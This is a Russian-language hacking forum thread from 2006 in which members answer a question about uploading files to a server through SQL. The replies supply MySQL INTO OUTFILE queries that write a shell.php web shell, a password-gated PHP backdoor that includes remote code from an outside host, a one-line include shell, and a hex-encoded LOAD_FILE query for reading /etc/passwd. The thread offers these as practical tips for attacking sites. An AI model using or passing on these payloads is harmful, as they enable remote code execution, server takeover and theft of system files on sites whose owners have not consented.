HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с Sql
  #1  
Старый 17.12.2006, 18:20
TAZMAD
Новичок
Регистрация: 19.11.2004
Сообщений: 6
С нами: 11300996

Репутация: 0
По умолчанию Помогите с Sql

Здравствуйте, хотел бы спросить у более знающих, какой командой можно залить файл на сервер с помощью Sql.


Зарание благодарен....
 
Ответить с цитированием

  #2  
Старый 17.12.2006, 18:28
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию

select 'file_content' INTO OUTFILE '/путь'
 
Ответить с цитированием

  #3  
Старый 17.12.2006, 18:29
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

outfile
Код:
SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';
 
Ответить с цитированием

  #4  
Старый 17.12.2006, 18:58
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

Точнее сначала нужно засунуть в запись name с id=0 пхп код ) я например люблю что-ниб вроде
PHP код:
<? 
if ($_POST ['someshit'] == "killme")
{
include (
"http://someshit.nm.ru/br/s.php");

else 
{
die;
}
?>
а уже после делать то что написал Green_Bear =)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #5  
Старый 18.12.2006, 01:47
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
С нами: 10578566

Репутация: 1228


По умолчанию

а не проще ли сделать
Код:
SELECT '<? include($i); ?>' FROM table INTO OUTFILE '/path/to/file/shell.php';
 
Ответить с цитированием

  #6  
Старый 18.12.2006, 04:05
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

а если путь не известен?
 
Ответить с цитированием

  #7  
Старый 18.12.2006, 07:09
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

Цитата:
а если путь не известен?
То узнай его...
 
Ответить с цитированием

  #8  
Старый 18.12.2006, 22:18
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от [ cash ]  
То узнай его...
Как если ошибка не выводится?
 
Ответить с цитированием

  #9  
Старый 18.12.2006, 22:40
SQLHACK
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
С нами: 10326626

Репутация: 1617


По умолчанию

что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

А какая версия SQL сервера mysql, mssql &
 
Ответить с цитированием

  #10  
Старый 19.12.2006, 15:18
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от SQLHACK  
что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

А какая версия SQL сервера mysql, mssql &
mysql 4.0.21 прав мало походу не могу прочесть passwd, локального инклуда нету.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!! farik.aka Уязвимости Mail-сервис 1 17.09.2006 13:00



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.